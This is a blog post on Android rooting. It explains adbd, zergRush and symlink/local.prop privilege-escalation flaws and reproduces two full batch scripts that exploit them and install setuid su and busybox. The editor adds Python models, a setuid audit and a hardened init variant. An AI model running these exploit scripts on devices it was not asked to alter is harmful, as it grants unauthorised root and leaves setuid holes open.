Thoughts on Android root
2012-11-25 21:31
1 On Android, almost anything you want to do on the device runs into permission restrictions, so you frequently need to obtain root.
2 The way to obtain root is not the same on every Android version. This is decided by vulnerabilities in Android's own source code: rooting means exploiting a vulnerability in the Android system, and because each version has different vulnerabilities, the rooting method differs from version to version. The exploit only yields a temporary root shell; what makes the device "rooted" afterwards is the persistent setup in step 3.
3 The final step of rooting is always the same: put a setuid-root su binary in /system/bin or /system/xbin, put a busybox binary in /system/xbin, and install Superuser.apk to manage which apps are allowed to use su.
4 The vulnerabilities used, by Android version, are:
1 adbd: at start-up adbd drops from root to the shell user with setuid(), but never checks whether the call succeeded. The shell user has a maximum number of processes; by fork()ing new processes (left as zombies) until that limit is reached, the attacker makes adbd's setuid() to the shell user fail the next time adbd starts, so the statement that drops privileges is effectively skipped and adbd keeps running as root. Every adb shell is then a root shell. The fix is simply to check the return value of setuid() and exit when it fails.
2 zergRush exploit: a stack overflow in a system daemon that is reachable from the shell user. It needs a prebuilt zergRush executable that is pushed to the device and run.
3
4 Android 4.0: root by re-linking. The shell user owns /data/local/tmp. If that directory is replaced by a symlink to /data and the device is rebooted, init's boot-time setup of /data/local/tmp (mkdir, chmod, chown) follows the symlink and is applied to /data itself, which leaves /data writable by the shell user. The shell user can then create /data/local.prop containing ro.kernel.qemu=1; init reads that file at boot, and adbd, seeing the property that marks an emulator, never drops its privileges, so adb shell is root. After that the usual su, busybox and Superuser.apk can be installed and the symlink and local.prop removed again.
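The adbd start-up decision behind items 1 and 4, as an added example by the editor rather than code from the post or from AOSP. It models, in Python, the privilege-drop logic adbd used on builds of that era as the editor understands it (an assumption, simplified: ro.kernel.qemu=1 turns secure mode off outright; otherwise ro.secure=1 means drop to the shell uid, with "adb root" allowed only on ro.debuggable builds). FakeKernel, its nproc_limit and PRODUCTION_PROPS are constructed stand-ins so the model runs offline; AID_ROOT and AID_SHELL are the real Android ids.

```python
"""Model of how adbd decides whether to drop root, and of the two ways the
post above defeats that decision (exhausting the shell uid's process limit,
and planting ro.kernel.qemu=1). Editor's example, not AOSP code."""

AID_ROOT = 0
AID_SHELL = 2000


class SetuidFailed(OSError):
    """Raised by the fixed adbd when it refuses to keep running as root."""


class FakeKernel:
    """Stand-in for the kernel (assumption): counts processes per uid and
    enforces an assumed RLIMIT_NPROC the way fork(2) and setuid(2) do for
    non-root uids."""

    def __init__(self, nproc_limit):
        self.nproc_limit = nproc_limit
        self.procs = {}  # uid -> live processes (zombies still count)

    def _at_limit(self, uid):
        return uid != AID_ROOT and self.procs.get(uid, 0) >= self.nproc_limit

    def fork(self, uid):
        """fork() by `uid`: -1 (EAGAIN) once the uid is at its process limit."""
        if self._at_limit(uid):
            return -1
        self.procs[uid] = self.procs.get(uid, 0) + 1
        return self.procs[uid]  # stands in for the child's pid

    def setuid(self, target):
        """setuid() from root to `target`: -1 (EAGAIN) when `target` already
        has RLIMIT_NPROC processes. This is the failure adbd ignored."""
        return -1 if self._at_limit(target) else 0


def parse_prop_file(text):
    """Parse key=value lines the way init reads /data/local.prop."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip()
    return props


def adbd_startup(props, kernel, check_setuid_result):
    """Return the uid that `adb shell` ends up running as.

    props: system properties as adbd reads them (build props plus whatever
           init loaded from /data/local.prop).
    check_setuid_result=False models the vulnerable adbd that ignores the
    return value of setuid(); True models the fixed adbd that aborts.
    """
    secure = False
    if props.get("ro.kernel.qemu") != "1":  # "in the emulator" -> never secure
        if props.get("ro.secure", "1") == "1":
            secure = True
            # 'adb root' on a userdebug build is the only legitimate way back
            if props.get("ro.debuggable") == "1" and props.get("service.adb.root") == "1":
                secure = False
    if not secure:
        return AID_ROOT  # this is what ro.kernel.qemu=1 in /data/local.prop buys
    if kernel.setuid(AID_SHELL) != 0:
        if check_setuid_result:
            raise SetuidFailed("setuid(AID_SHELL) failed; refusing to run as root")
        return AID_ROOT  # vulnerable: the drop silently failed, adbd is still root
    return AID_SHELL


def fill_shell_process_quota(kernel):
    """The forking half of the adbd attack: spawn shell-uid processes until
    fork() fails, so that a later setuid(AID_SHELL) must fail as well."""
    spawned = 0
    while kernel.fork(AID_SHELL) != -1:
        spawned += 1
    return spawned


# Constructed build properties of a production device (assumed values).
PRODUCTION_PROPS = {"ro.secure": "1", "ro.debuggable": "0"}

if __name__ == "__main__":
    k = FakeKernel(nproc_limit=50)
    print("normal boot      ->", adbd_startup(PRODUCTION_PROPS, k, False))
    print("forked", fill_shell_process_quota(k), "shell processes")
    print("adbd restarted   ->", adbd_startup(PRODUCTION_PROPS, k, False))
    planted = {**PRODUCTION_PROPS, **parse_prop_file("ro.kernel.qemu=1\n")}
    print("local.prop trick ->", adbd_startup(planted, FakeKernel(50), True))
```

Note that the fixed adbd (check_setuid_result=True) still ends up as root under the local.prop trick: checking setuid() only closes item 1, while item 4 never reaches the setuid() call at all because init handed the attacker control over a property adbd trusts.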
5 The commands used to obtain root are as follows:
zergRush exploit:
@echo ---------------------------------------------------------------
@echo Easy rooting toolkit (v1.0)
@echo created by DooMLoRD
@echo using exploit zergRush (Revolutionary Team)
@echo Credits go to all those involved in making this possible!
@echo ---------------------------------------------------------------
@echo [*] This script will:
@echo (1) root your device using zergRush exploit
@echo (2) install Busybox (1.18.4)
@echo (3) install SU files (3.0.5)
@echo [*] Before you begin:
@echo (1) make sure you have installed adb drivers for your device
@echo (2) enable "USB DEBUGGING"
@echo from (Menu\Settings\Applications\Development)
@echo (3) enable "UNKNOWN SOURCES"
@echo from (Menu\Settings\Applications)
@echo (4) [OPTIONAL] increase screen timeout to 10 minutes
@echo (5) connect USB cable to PHONE and then connect to PC
@echo (6) skip "PC Companion Software" prompt on device
@echo ---------------------------------------------------------------
@echo CONFIRM ALL THE ABOVE THEN
@pause
@echo --- STARTING ----
@echo --- WAITING FOR DEVICE
@files\adb wait-for-device
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- pushing zergRush
@rem /data/local/tmp is the one place the unprivileged shell user can write to and execute from
@files\adb push files\zergRush /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 777 /data/local/tmp/zergRush"
@echo --- executing zergRush
@rem on success the exploit restarts adbd as root, so the device briefly disconnects
@files\adb shell "/data/local/tmp/zergRush"
@echo --- WAITING FOR DEVICE TO RECONNECT
@echo if it gets stuck over here for a long time then try:
@echo disconnect usb cable and reconnect it
@echo toggle "USB DEBUGGING" (first disable it then enable it)
@files\adb wait-for-device
@echo --- DEVICE FOUND
@echo --- pushing busybox
@files\adb push files\busybox /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 755 /data/local/tmp/busybox"
@echo --- remounting /system
@rem everything from here on only works because adb shell is now root
@files\adb shell "/data/local/tmp/busybox mount -o remount,rw /system"
@echo --- copying busybox to /system/xbin/
@files\adb shell "dd if=/data/local/tmp/busybox of=/system/xbin/busybox"
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/xbin/busybox"
@echo --- correcting permissions
@rem 04755 makes busybox setuid root: any uid can then run any applet as root, with no Superuser prompt
@files\adb shell "chmod 04755 /system/xbin/busybox"
@echo --- installing busybox
@files\adb shell "/system/xbin/busybox --install -s /system/xbin"
@files\adb shell "rm -r /data/local/tmp/busybox"
@echo --- pushing SU binary
@files\adb push files\su /system/bin/su
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/bin/su"
@echo --- correcting permissions
@rem 06755 = setuid + setgid root: this is the persistent root that Superuser.apk mediates
@files\adb shell "chmod 06755 /system/bin/su"
@echo --- correcting symlinks
@files\adb shell "rm /system/xbin/su"
@files\adb shell "ln -s /system/bin/su /system/xbin/su"
@echo --- pushing Superuser app
@files\adb push files\Superuser.apk /system/app/.
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- rebooting
@files\adb reboot
@echo ALL DONE!!!
@pause
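A post-root audit of what the scripts leave behind in /system, as an added example by the editor (not code from the post, nor from the DooMLoRD or zopo008 toolkits). It parses the `ls -l` output of Android's toolbox (mode, owner, group, size for regular files only, date, time, name) and reports setuid and world-writable files. SAMPLE_LISTINGS is constructed to match the end state the scripts produce (su 06755, busybox 04755, the su symlink); debug.sh is an invented extra entry that exercises the world-writable check.

```python
"""Audit of /system/bin and /system/xbin after rooting. Editor's example;
feed it real data from `adb shell ls -l /system/bin /system/xbin`."""
import re

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")

# Constructed listings in toolbox `ls -l` format (not captured from a device).
SAMPLE_LISTINGS = {
    "/system/bin": """\
-rwsr-sr-x root     shell        22364 2012-11-25 21:31 su
-rwxr-xr-x root     shell       270508 2012-11-25 21:31 toolbox
-rwxrwxrwx root     shell         1234 2012-11-25 21:31 debug.sh
""",
    "/system/xbin": """\
-rwsr-xr-x root     shell      1085140 2012-11-25 21:31 busybox
lrwxrwxrwx root     root              2012-11-25 21:31 su -> /system/bin/su
lrwxrwxrwx root     root              2012-11-25 21:31 ls -> busybox
""",
}


def mode_to_octal(mode):
    """'-rwsr-sr-x' -> 0o6755. Lowercase s/t mean the execute bit is also set."""
    perm = 0
    for i, ch in enumerate(mode[1:10]):
        if ch in "rwxst":
            perm |= 1 << (8 - i)
        if i == 2 and ch in "sS":
            perm |= 0o4000
        if i == 5 and ch in "sS":
            perm |= 0o2000
        if i == 8 and ch in "tT":
            perm |= 0o1000
    return perm


def parse_ls(text):
    """Parse toolbox `ls -l` lines. Directories and symlinks have no size
    column, so the date column is located by pattern, not by position."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        mode, owner, group = parts[0], parts[1], parts[2]
        try:
            date_idx = next(i for i, p in enumerate(parts) if DATE_RE.fullmatch(p))
        except StopIteration:
            continue
        name = " ".join(parts[date_idx + 2:])
        target = None
        if " -> " in name:
            name, target = name.split(" -> ", 1)
        entries.append({
            "type": mode[0], "octal": mode_to_octal(mode),
            "owner": owner, "group": group, "name": name, "target": target,
            "setuid": mode[3] in "sS", "setgid": mode[6] in "sS",
            "world_writable": mode[8] == "w",
        })
    return entries


def audit(listings):
    """listings: {directory: ls -l text}. Returns [(severity, message), ...]."""
    findings = []
    for directory, text in listings.items():
        for e in parse_ls(text):
            path = f"{directory}/{e['name']}"
            if e["type"] == "l":
                continue  # a symlink's bits are meaningless; the target is audited
            if e["setuid"] and e["owner"] == "root":
                if e["name"] == "busybox":
                    findings.append(("HIGH", f"{path} is setuid root: any uid can run every applet as root"))
                elif e["name"] == "su":
                    findings.append(("INFO", f"{path} is setuid root: device is rooted"))
                else:
                    findings.append(("WARN", f"{path} is setuid root (mode {e['octal']:04o})"))
            if e["world_writable"]:
                findings.append(("HIGH", f"{path} is world-writable (mode {e['octal']:04o})"))
    return findings


if __name__ == "__main__":
    for severity, message in audit(SAMPLE_LISTINGS):
        print(f"[{severity}] {message}")
```

The setuid busybox that the zergRush script installs is rated higher than su itself on purpose: Superuser.apk only mediates requests that go through su, while a setuid busybox lets any app run any applet (mount, dd, sh) as root without a prompt. If you use that script, follow it with chmod 0755 on /system/xbin/busybox.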
Under Android 4.0:
@echo off
cls
echo.
echo by zopo008 (you are welcome to visit bbs.zopomobile.com)
echo.
echo.
rem Step 1: /data/local/tmp is owned by the shell user. Replace it with a symlink to
rem /data so that init's boot-time mkdir/chmod/chown of /data/local/tmp lands on /data.
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
echo Rebooting (1/3) - Continue once device finishes rebooting
pause
rem Step 2: /data is now writable by shell. Plant /data/local.prop so init sets
rem ro.kernel.qemu=1 at boot; adbd then believes it runs in the emulator and stays root.
adb shell rm /data/local.prop > nul
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
echo Rebooting (2/3) - Continue once device finishes rebooting
pause
rem Step 3: confirm that adb shell is root before writing to /system
adb shell id
echo If the id is 0 / root then continue, otherwise press Ctrl-C (and answer Y) to cancel this root attempt and start over
pause
rem Step 4: adbd runs as root, so "adb remount" can mount /system read-write
adb remount
adb push su /system/bin/su
adb shell chown 0.0 /system/bin/su
adb shell chmod 06755 /system/bin/su
adb push busybox /system/bin/busybox
adb shell chown 0.0 /system/bin/busybox
adb shell chmod 0755 /system/bin/busybox
adb push Superuser.apk /system/app/Superuser.apk
adb shell chown 0.0 /system/app/Superuser.apk
adb shell chmod 0644 /system/app/Superuser.apk
adb push RootExplorer.apk /system/app/RootExplorer.apk
adb shell chown 0.0 /system/app/RootExplorer.apk
adb shell chmod 0644 /system/app/RootExplorer.apk
rem Step 5: remove the symlink and local.prop; after this reboot adbd drops to shell
rem again and only su, busybox and the two apps remain.
echo Removing changes except ROOT
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot
echo Rebooting (3/3) - You should now be Rooted
pause
echo on
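Why step 1 of the Android 4.0 script works, replayed on a real filesystem as an added example by the editor (not code from the post and not Android's init). boot_setup_vulnerable is a stand-in for init's boot-time `mkdir /data/local/tmp 0771 shell shell` step as the editor understands it (an assumption: create the directory if missing, then chmod/chown the path, where chmod(2) and chown(2) follow symlinks); boot_setup_safe is the editor's hardened variant. Everything happens in a temporary directory, chown is left out because it needs root, and chmod shows the same symlink-following behaviour.

```python
"""Replay of the /data/local/tmp -> /data symlink trick. Editor's example."""
import os
import shutil
import stat
import tempfile


def boot_setup_vulnerable(path, mode):
    """init-style mkdir: mkdir(2) fails with EEXIST because the symlink exists,
    so fall through to chmod(2), which follows the symlink to its target."""
    try:
        os.mkdir(path, mode)
    except FileExistsError:
        pass
    os.chmod(path, mode)  # follows symlinks: changes the target, not the link


def boot_setup_safe(path, mode):
    """Hardened variant: inspect the path without following links and refuse
    to apply modes to anything that is not a real directory."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        os.mkdir(path, mode)
        os.chmod(path, mode)
        return
    if not stat.S_ISDIR(st.st_mode):
        raise OSError(f"{path} is a symlink or a file, refusing to chmod it")
    os.chmod(path, mode)


def replay_boot(attacker_symlink, safe=False):
    """Build data/local/tmp under a temp dir with data locked down (0700 stands
    in for Android's root-only /data), optionally apply the script's mv + ln -s,
    run the boot step, and return the resulting permission bits of data."""
    root = tempfile.mkdtemp()
    try:
        data = os.path.join(root, "data")
        tmp = os.path.join(data, "local", "tmp")
        os.makedirs(tmp)
        os.chmod(data, 0o700)
        if attacker_symlink:
            # adb shell mv /data/local/tmp /data/local/tmp.bak
            # adb shell ln -s /data /data/local/tmp
            os.rename(tmp, tmp + ".bak")
            os.symlink(data, tmp)
        setup = boot_setup_safe if safe else boot_setup_vulnerable
        try:
            setup(tmp, 0o771)  # what init does at the next boot
        except OSError:
            pass  # the safe variant refuses; data is left untouched
        return stat.S_IMODE(os.stat(data).st_mode)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print("clean boot:         data is %04o" % replay_boot(False))
    print("after mv + ln -s:   data is %04o" % replay_boot(True))
    print("with hardened init: data is %04o" % replay_boot(True, safe=True))
```

On the device the chown half of the same step is what matters: with the symlink in place, /data ends up owned by shell, which is exactly the write access step 2 of the script needs for /data/local.prop. The general lesson is that any privileged process applying chmod/chown to a path under a directory a lower-privileged user controls must use lstat-style, non-following operations or refuse symlinks outright.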